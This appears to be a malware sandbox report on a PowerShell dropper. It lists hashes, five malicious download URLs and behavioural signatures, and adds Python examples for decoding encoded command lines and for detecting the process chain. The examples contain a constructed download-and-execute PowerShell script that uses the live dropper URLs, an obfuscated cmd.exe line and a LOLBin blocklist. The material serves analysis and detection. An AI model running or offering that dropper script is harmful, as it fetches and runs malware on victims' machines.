General

  • Target

    56934634a32985c597e2ae614d55d190_JaffaCakes118

  • Size

    68KB

  • Sample

    240518-yzhvqadc8x

  • MD5

    56934634a32985c597e2ae614d55d190

  • SHA1

    abc518e027b0f1d3735be583a06f8f376afceed6

  • SHA256

    dafe595d8dc3cf275a9d6bea2e5151d40480a2d4b0e6c020b8065fe1a7972c80

  • SHA512

    4efd15c46a470220418a60936a97991dabeaa73331a0e5a18050af62582324376cff62c548fdfa2f72a4593be2aa1daacb3a45d61c565122c6335d6dada45af5

  • SSDEEP

    768:upJcaUitGAlmrJpmxlzC+w99NBE+1o/BqbMmBktlFAO2vxwpp:uptJlmrJpmxlRw99NBE+a/SknF

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (all of type exe.dropper)

    http://mooremakeup.com/k
    http://crossroadstamp.com/0
    http://ntsuporte.com.br/kl5
    http://oooka.biz/RaQOFhRM
    http://parusalon.ru/idb
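The extracted config above comes from decoding the sample's PowerShell, undoing its obfuscation and pulling the URL list out of the cleaned script. The Python below is an added example of that extraction step; it is not code from this report or from the sandbox. The command line and script it decodes are constructed to match the usual dropper pattern (an '@'-separated URL list tried in turn until one download succeeds, the list split across two string literals and the cmdlets randomly cased); the real command line is not reproduced on this page, and only the five URLs are taken from the report. All function and variable names are the example's own.

```python
import base64
import re
from typing import Optional

# Constructed PowerShell dropper script (NOT the one captured for this sample; the
# report does not reproduce it). Only the five URLs are the report's extracted config.
# The URL list is split across two literals and cmdlets are randomly cased: two cheap
# tricks that defeat naive string matching on the encoded command line.
SAMPLE_SCRIPT = (
    "$w=nEw-oBjEcT NeT.WeBcLiEnT;"
    "$l=('http://mooremakeup.com/k@http://crossroadstamp.com/0@http://ntsuporte.com.br/kl5'"
    "+'@http://oooka.biz/RaQOFhRM@http://parusalon.ru/idb').sPlIt('@');"
    "$p=$env:TEMP+'\\'+(Get-Random)+'.exe';"
    "foreach($u in $l){try{$w.DoWnLoAdFiLe($u,$p);Start-Process $p;break}catch{}}"
)


def encode_command(script: str) -> str:
    """Build the -EncodedCommand argument the way powershell.exe expects it:
    base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line in the shape a macro launches; the -Exec Bypass switch is
# there on purpose, to show that '-e' prefix matching must tolerate it.
SAMPLE_CMDLINE = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EnC " + encode_command(SAMPLE_SCRIPT)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so the switch is matched loosely and base64/UTF-16 validation rejects false hits.
ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# '@' is excluded from URL paths because these droppers use it as the list separator.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"@;)<>]*)?")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script from an encoded powershell command line, or None if absent."""
    for blob in ENC_RE.findall(cmdline):
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64/UTF-16, e.g. the argument of -Exec
    return None


def deobfuscate(script: str) -> str:
    """Fold 'a'+'b' literal concatenation back into a single literal so URLs are whole.
    Case is deliberately left alone: URL paths such as /RaQOFhRM are case-sensitive on
    the server, so later matching is case-insensitive instead of lowercasing the script."""
    while True:
        folded = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if folded == script:
            return script
        script = folded


def extract_urls(script: str) -> list:
    """Return the unique URLs in order of appearance."""
    urls = []
    for u in URL_RE.findall(script):
        if u not in urls:
            urls.append(u)
    return urls


def classify(script: str) -> str:
    """Mirror the report's type label: a file downloaded to an .exe path and launched
    is an exe.dropper. Anything else is left unlabelled rather than guessed."""
    s = script.lower()
    if "downloadfile" in s and ".exe" in s:
        return "exe.dropper"
    return "unknown"


def extract_config(cmdline: str) -> dict:
    """Produce the same fields the Malware Config section shows: language,
    deobfuscated script, URLs and payload type."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"language": None, "deobfuscated": None, "urls": [], "type": "unknown"}
    clean = deobfuscate(script)
    return {"language": "ps1", "deobfuscated": clean,
            "urls": extract_urls(clean), "type": classify(clean)}


if __name__ == "__main__":
    cfg = extract_config(SAMPLE_CMDLINE)
    print("Language:", cfg["language"])
    for url in cfg["urls"]:
        print(cfg["type"], url)
```

Two details matter in practice: the switch regex is loose because powershell.exe accepts any unambiguous prefix of -EncodedCommand, so a decoder keyed on the literal string -EncodedCommand misses most real droppers; and the script is never lowercased wholesale, since the path components of the extracted URLs are case-sensitive and lowercasing them would produce IOCs that no longer match the live infrastructure.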

Targets

    • Target

      56934634a32985c597e2ae614d55d190_JaffaCakes118

    • Size

      68KB

    • MD5

      56934634a32985c597e2ae614d55d190

    • SHA1

      abc518e027b0f1d3735be583a06f8f376afceed6

    • SHA256

      dafe595d8dc3cf275a9d6bea2e5151d40480a2d4b0e6c020b8065fe1a7972c80

    • SHA512

      4efd15c46a470220418a60936a97991dabeaa73331a0e5a18050af62582324376cff62c548fdfa2f72a4593be2aa1daacb3a45d61c565122c6335d6dada45af5

    • SSDEEP

      768:upJcaUitGAlmrJpmxlzC+w99NBE+1o/BqbMmBktlFAO2vxwpp:uptJlmrJpmxlRw99NBE+a/SknF

    Score
    10/10

    Signatures

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Obfuscated cmd.exe command-line

      An obfuscated cmd.exe command-line is typically used to evade detection.
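The three signatures above are behavioural: they fire on the process tree and the network trace, not on the file hash, which is why they survive a repack of the sample. The Python below is an added example of those three checks run over a constructed event list; it is not the sandbox's own detection code. The trace, the process names and the tuning lists are assumptions chosen to reproduce the chain the signatures describe (a document handler spawning cmd.exe, cmd.exe launching PowerShell, PowerShell fetching from one of the listed hosts). The pids, the caret threshold and the placeholder -e argument are illustrative.

```python
import re

# Constructed process and network events in the shape a sandbox trace has
# (pid, parent pid, image, command line; network rows carry the destination).
# This is NOT this sample's trace, which the report does not reproduce. The chain
# is the one the report's signatures describe, and the destination reuses one of
# the report's dropper hosts. 'SQBFAFgA' is just UTF-16LE 'IEX' in base64, a placeholder.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100, "image": "WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n invoice.doc'},
    {"type": "process", "pid": 300, "ppid": 200, "image": "cmd.exe",
     "cmdline": 'cmd /c s^e^t x=pow&&c^a^l^l %x%^er^s^hell -w hidden -e SQBFAFgA'},
    {"type": "process", "pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": "powershell -w hidden -e SQBFAFgA"},
    {"type": "network", "pid": 400, "dest": "mooremakeup.com", "port": 80},
    {"type": "process", "pid": 500, "ppid": 100, "image": "chrome.exe", "cmdline": "chrome.exe"},
    {"type": "network", "pid": 500, "dest": "example.com", "port": 443},
]

# Assumed tuning lists; a real sandbox ships longer ones and adapts them per environment.
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
NET_BLOCKLIST = {"powershell.exe", "pwsh.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
                 "certutil.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe"}
# Matches bare 'cmd', 'cmd.exe' or a full quoted path to cmd.exe at the start of a command line.
CMD_RE = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?(?:\s|$)', re.I)
# %var:~start,len% substring expansion, used to assemble tokens from an environment variable.
SUBSTR_EXPANSION_RE = re.compile(r"%[^%\s]+:~\s*-?\d")


def processes(events):
    """Index process-creation events by pid."""
    return {e["pid"]: e for e in events if e["type"] == "process"}


def unexpected_child(events):
    """Signature 1: a document handler spawning a script host. Returns (parent, child) pairs."""
    procs = processes(events)
    hits = []
    for p in procs.values():
        parent = procs.get(p["ppid"])
        if parent and parent["image"].lower() in DOCUMENT_HANDLERS \
                and p["image"].lower() in SCRIPT_HOSTS:
            hits.append((parent["image"], p["image"]))
    return hits


def blocklisted_net(events):
    """Signature 2: a blocklisted LOLBin making a network request. Returns (image, dest) pairs."""
    procs = processes(events)
    hits = []
    for e in events:
        if e["type"] != "network":
            continue
        image = procs.get(e["pid"], {}).get("image", "")
        if image.lower() in NET_BLOCKLIST:
            hits.append((image, e["dest"]))
    return hits


def obfuscated_cmd(cmdline, caret_threshold=3):
    """Signature 3: cmd.exe obfuscation. Escape carets splitting tokens and %var:~n,m%
    substring expansion are the common tells; the caret threshold is an assumption."""
    if not CMD_RE.match(cmdline):
        return False
    return cmdline.count("^") >= caret_threshold or bool(SUBSTR_EXPANSION_RE.search(cmdline))


def run_signatures(events):
    """Return the names of triggered signatures, as the Targets section lists them."""
    fired = []
    if unexpected_child(events):
        fired.append("Process spawned unexpected child process")
    if blocklisted_net(events):
        fired.append("Blocklisted process makes network request")
    if any(obfuscated_cmd(e["cmdline"]) for e in processes(events).values()):
        fired.append("Obfuscated cmd.exe command-line")
    return fired


if __name__ == "__main__":
    for name in run_signatures(EVENTS):
        print("*", name)
```

The parent/child rule is the high-signal one: a word processor has no legitimate reason to start cmd.exe or PowerShell, so the pair alone is worth an alert even when the command line is clean. The network rule needs the blocklist tuned per estate (rundll32.exe and regsvr32.exe do make legitimate connections on some builds), and the caret heuristic is a tripwire rather than a parser; cmd.exe obfuscation has many other forms, so treat a miss as unknown, not as benign.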

MITRE ATT&CK Enterprise v15
